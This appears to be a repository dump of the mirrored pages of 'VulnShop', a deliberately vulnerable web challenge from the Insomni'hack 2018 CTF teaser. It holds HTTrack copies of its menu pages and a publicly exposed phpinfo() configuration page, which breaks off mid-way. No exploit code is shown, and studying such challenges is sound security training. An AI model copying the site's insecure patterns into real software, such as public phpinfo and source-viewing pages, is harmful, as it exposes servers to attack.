<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">?&gt;
<br /></span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;/div&gt;
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;/div&gt;
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;p&gt;&lt;a&nbsp;href="/?hl"&gt;View&nbsp;code&nbsp;source&nbsp;of&nbsp;the&nbsp;file,&nbsp;to&nbsp;be&nbsp;sure&nbsp;we're&nbsp;secure!&lt;/a&gt;&lt;/p&gt;
<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;p&gt;&lt;a&nbsp;href="/phpinfo.php"&gt;Show&nbsp;our&nbsp;configurations&lt;/a&gt;&lt;/p&gt;
<br />&nbsp;&nbsp;&nbsp;&nbsp;&lt;/body&gt;
<br />&lt;/html&gt;
<br /></span>
3 | </code>


--------------------------------------------------------------------------------
/2018/Insomni'hack teaser/VulnShop/source/vulnshop.teaser.insomnihack.ch/index32da.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html>
 3 | 	
 4 | <!-- Mirrored from vulnshop.teaser.insomnihack.ch/?page=introduction by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 21 Jan 2018 19:41:44 GMT -->
 5 | <!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
 6 | <head>
 7 | 		<title>Work in progress...</title>
 8 | 		<meta charset="utf-8" />
 9 | 		<meta http-equiv="content-type" content="text/html; charset=utf-8" />
10 | 		<style>
11 | 			body {
12 | 				background-color: #aaa;
13 | 				color:#fff;
14 | 			}
15 | 			
16 | 			.page {
17 | 				width: 50%;
18 | 				margin: 0 auto;
19 | 				margin-top: 75px;
20 | 			}
21 | 			
22 | 			
23 | 			.menu ul li {
24 | 				display:inline-block;
25 | 				vertical-align:top;
26 | 				margin-right: 30px;
27 | 				
28 | 			}
29 | 		</style>
30 | 	</head>
31 | 	<body>
32 | 		<div class="page">
33 | 			<div class="menu">
34 | 				<ul>
35 | 					<li><a href="index1380.html?page=default">Home</a></li>
36 | 					<li><a href="index32da.html?page=introduction">Introduction</a></li>
37 | 					<li><a href="index8a5f.html?page=privacy">Privacy</a></li>
38 | 					<li><a href="index84f6.html?page=contactus">Contact</a></li>
39 | 				</ul>
40 | 			</div>
41 | 			
42 |             <div class="content">
43 |                 <p>Our website will introduce some new vulnerabilities. Let's check it out later!</p>	        </div>
44 | 		</div>
45 | 		<p><a href="index2b4c.html?hl">View code source of the file, to be sure we're secure!</a></p>
46 | 		<p><a href="phpinfo.html">Show our configurations</a></p>
47 | 	</body>
48 | 
49 | <!-- Mirrored from vulnshop.teaser.insomnihack.ch/?page=introduction by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 21 Jan 2018 19:41:44 GMT -->
50 | </html>
51 | 


--------------------------------------------------------------------------------
/2018/Insomni'hack teaser/VulnShop/source/vulnshop.teaser.insomnihack.ch/index84f6.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html>
 3 | 	
 4 | <!-- Mirrored from vulnshop.teaser.insomnihack.ch/?page=contactus by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 21 Jan 2018 19:41:45 GMT -->
 5 | <!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
 6 | <head>
 7 | 		<title>Work in progress...</title>
 8 | 		<meta charset="utf-8" />
 9 | 		<meta http-equiv="content-type" content="text/html; charset=utf-8" />
10 | 		<style>
11 | 			body {
12 | 				background-color: #aaa;
13 | 				color:#fff;
14 | 			}
15 | 			
16 | 			.page {
17 | 				width: 50%;
18 | 				margin: 0 auto;
19 | 				margin-top: 75px;
20 | 			}
21 | 			
22 | 			
23 | 			.menu ul li {
24 | 				display:inline-block;
25 | 				vertical-align:top;
26 | 				margin-right: 30px;
27 | 				
28 | 			}
29 | 		</style>
30 | 	</head>
31 | 	<body>
32 | 		<div class="page">
33 | 			<div class="menu">
34 | 				<ul>
35 | 					<li><a href="index1380.html?page=default">Home</a></li>
36 | 					<li><a href="index32da.html?page=introduction">Introduction</a></li>
37 | 					<li><a href="index8a5f.html?page=privacy">Privacy</a></li>
38 | 					<li><a href="index84f6.html?page=contactus">Contact</a></li>
39 | 				</ul>
40 | 			</div>
41 | 			
42 |             <div class="content">
43 |                 <p>You can't contact us for the moment, but it will be available later.</p>	        </div>
44 | 		</div>
45 | 		<p><a href="index2b4c.html?hl">View code source of the file, to be sure we're secure!</a></p>
46 | 		<p><a href="phpinfo.html">Show our configurations</a></p>
47 | 	</body>
48 | 
49 | <!-- Mirrored from vulnshop.teaser.insomnihack.ch/?page=contactus by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 21 Jan 2018 19:41:45 GMT -->
50 | </html>
51 | 


--------------------------------------------------------------------------------
/2018/Insomni'hack teaser/VulnShop/source/vulnshop.teaser.insomnihack.ch/index8a5f.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html>
 3 | 	
 4 | <!-- Mirrored from vulnshop.teaser.insomnihack.ch/?page=privacy by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 21 Jan 2018 19:41:44 GMT -->
 5 | <!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
 6 | <head>
 7 | 		<title>Work in progress...</title>
 8 | 		<meta charset="utf-8" />
 9 | 		<meta http-equiv="content-type" content="text/html; charset=utf-8" />
10 | 		<style>
11 | 			body {
12 | 				background-color: #aaa;
13 | 				color:#fff;
14 | 			}
15 | 			
16 | 			.page {
17 | 				width: 50%;
18 | 				margin: 0 auto;
19 | 				margin-top: 75px;
20 | 			}
21 | 			
22 | 			
23 | 			.menu ul li {
24 | 				display:inline-block;
25 | 				vertical-align:top;
26 | 				margin-right: 30px;
27 | 				
28 | 			}
29 | 		</style>
30 | 	</head>
31 | 	<body>
32 | 		<div class="page">
33 | 			<div class="menu">
34 | 				<ul>
35 | 					<li><a href="index1380.html?page=default">Home</a></li>
36 | 					<li><a href="index32da.html?page=introduction">Introduction</a></li>
37 | 					<li><a href="index8a5f.html?page=privacy">Privacy</a></li>
38 | 					<li><a href="index84f6.html?page=contactus">Contact</a></li>
39 | 				</ul>
40 | 			</div>
41 | 			
42 |             <div class="content">
43 |                 <p>This website is unbreakable, so don't worry when contacting us about some new vulnerabilities!</p>	        </div>
44 | 		</div>
45 | 		<p><a href="index2b4c.html?hl">View code source of the file, to be sure we're secure!</a></p>
46 | 		<p><a href="phpinfo.html">Show our configurations</a></p>
47 | 	</body>
48 | 
49 | <!-- Mirrored from vulnshop.teaser.insomnihack.ch/?page=privacy by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 21 Jan 2018 19:41:44 GMT -->
50 | </html>
51 | 


--------------------------------------------------------------------------------
/2018/Insomni'hack teaser/VulnShop/source/vulnshop.teaser.insomnihack.ch/phpinfo.html:
--------------------------------------------------------------------------------
  1 | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
  2 | <html xmlns="http://www.w3.org/1999/xhtml">
  3 | <!-- Mirrored from vulnshop.teaser.insomnihack.ch/phpinfo.php by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 21 Jan 2018 19:41:45 GMT -->
  4 | <!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
  5 | <head>
  6 | <style type="text/css">
  7 | body {background-color: #fff; color: #222; font-family: sans-serif;}
  8 | pre {margin: 0; font-family: monospace;}
  9 | a:link {color: #009; text-decoration: none; background-color: #fff;}
 10 | a:hover {text-decoration: underline;}
 11 | table {border-collapse: collapse; border: 0; width: 934px; box-shadow: 1px 2px 3px #ccc;}
 12 | .center {text-align: center;}
 13 | .center table {margin: 1em auto; text-align: left;}
 14 | .center th {text-align: center !important;}
 15 | td, th {border: 1px solid #666; font-size: 75%; vertical-align: baseline; padding: 4px 5px;}
 16 | h1 {font-size: 150%;}
 17 | h2 {font-size: 125%;}
 18 | .p {text-align: left;}
 19 | .e {background-color: #ccf; width: 300px; font-weight: bold;}
 20 | .h {background-color: #99c; font-weight: bold;}
 21 | .v {background-color: #ddd; max-width: 300px; overflow-x: auto; word-wrap: break-word;}
 22 | .v i {color: #999;}
 23 | img {float: right; border: 0;}
 24 | hr {width: 934px; background-color: #ccc; border: 0; height: 1px;}
 25 | </style>
 26 | <title>phpinfo()</title><meta name="ROBOTS" content="NOINDEX,NOFOLLOW,NOARCHIVE" /></head>
 27 | <body><div class="center">
 28 | <table>
 29 | <tr class="h"><td>
 30 | <a href="http://www.php.net/"><img border="0" src="data:image/png;base64,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" alt="PHP logo" /></a><h1 class="p">PHP Version 7.0.27-1+ubuntu16.04.1+deb.sury.org+1</h1>
 31 | </td></tr>
 32 | </table>
 33 | <table>
 34 | <tr><td class="e">System </td><td class="v">Linux ip-172-31-17-117 4.4.0-1047-aws #56-Ubuntu SMP Sat Jan 6 19:39:06 UTC 2018 x86_64 </td></tr>
 35 | <tr><td class="e">Build Date </td><td class="v">Jan  5 2018 14:12:46 </td></tr>
 36 | <tr><td class="e">Server API </td><td class="v">Apache 2.0 Handler </td></tr>
 37 | <tr><td class="e">Virtual Directory Support </td><td class="v">disabled </td></tr>
 38 | <tr><td class="e">Configuration File (php.ini) Path </td><td class="v">/etc/php/7.0/apache2 </td></tr>
 39 | <tr><td class="e">Loaded Configuration File </td><td class="v">/etc/php/7.0/apache2/php.ini </td></tr>
 40 | <tr><td class="e">Scan this dir for additional .ini files </td><td class="v">/etc/php/7.0/apache2/conf.d </td></tr>
 41 | <tr><td class="e">Additional .ini files parsed </td><td class="v">/etc/php/7.0/apache2/conf.d/10-opcache.ini,
 42 | /etc/php/7.0/apache2/conf.d/10-pdo.ini,
 43 | /etc/php/7.0/apache2/conf.d/20-calendar.ini,
 44 | /etc/php/7.0/apache2/conf.d/20-ctype.ini,
 45 | /etc/php/7.0/apache2/conf.d/20-exif.ini,
 46 | /etc/php/7.0/apache2/conf.d/20-fileinfo.ini,
 47 | /etc/php/7.0/apache2/conf.d/20-ftp.ini,
 48 | /etc/php/7.0/apache2/conf.d/20-gettext.ini,
 49 | /etc/php/7.0/apache2/conf.d/20-iconv.ini,
 50 | /etc/php/7.0/apache2/conf.d/20-json.ini,
 51 | /etc/php/7.0/apache2/conf.d/20-phar.ini,
 52 | /etc/php/7.0/apache2/conf.d/20-posix.ini,
 53 | /etc/php/7.0/apache2/conf.d/20-readline.ini,
 54 | /etc/php/7.0/apache2/conf.d/20-shmop.ini,
 55 | /etc/php/7.0/apache2/conf.d/20-sockets.ini,
 56 | /etc/php/7.0/apache2/conf.d/20-sysvmsg.ini,
 57 | /etc/php/7.0/apache2/conf.d/20-sysvsem.ini,
 58 | /etc/php/7.0/apache2/conf.d/20-sysvshm.ini,
 59 | /etc/php/7.0/apache2/conf.d/20-tokenizer.ini
 60 |  </td></tr>
 61 | <tr><td class="e">PHP API </td><td class="v">20151012 </td></tr>
 62 | <tr><td class="e">PHP Extension </td><td class="v">20151012 </td></tr>
 63 | <tr><td class="e">Zend Extension </td><td class="v">320151012 </td></tr>
 64 | <tr><td class="e">Zend Extension Build </td><td class="v">API320151012,NTS </td></tr>
 65 | <tr><td class="e">PHP Extension Build </td><td class="v">API20151012,NTS </td></tr>
 66 | <tr><td class="e">Debug Build </td><td class="v">no </td></tr>
 67 | <tr><td class="e">Thread Safety </td><td class="v">disabled </td></tr>
 68 | <tr><td class="e">Zend Signal Handling </td><td class="v">disabled </td></tr>
 69 | <tr><td class="e">Zend Memory Manager </td><td class="v">enabled </td></tr>
 70 | <tr><td class="e">Zend Multibyte Support </td><td class="v">disabled </td></tr>
 71 | <tr><td class="e">IPv6 Support </td><td class="v">enabled </td></tr>
 72 | <tr><td class="e">DTrace Support </td><td class="v">available, disabled </td></tr>
 73 | <tr><td class="e">Registered PHP Streams</td><td class="v">https, ftps, compress.zlib, php, file, glob, data, http, ftp, phar</td></tr>
 74 | <tr><td class="e">Registered Stream Socket Transports</td><td class="v">tcp, udp, unix, udg, ssl, sslv2, tls, tlsv1.0, tlsv1.1, tlsv1.2</td></tr>
 75 | <tr><td class="e">Registered Stream Filters</td><td class="v">zlib.*, string.rot13, string.toupper, string.tolower, string.strip_tags, convert.*, consumed, dechunk, convert.iconv.*</td></tr>
 76 | </table>
 77 | <table>
 78 | <tr class="v"><td>
 79 | <a href="http://www.zend.com/"><img border="0" src="data:image/png;base64,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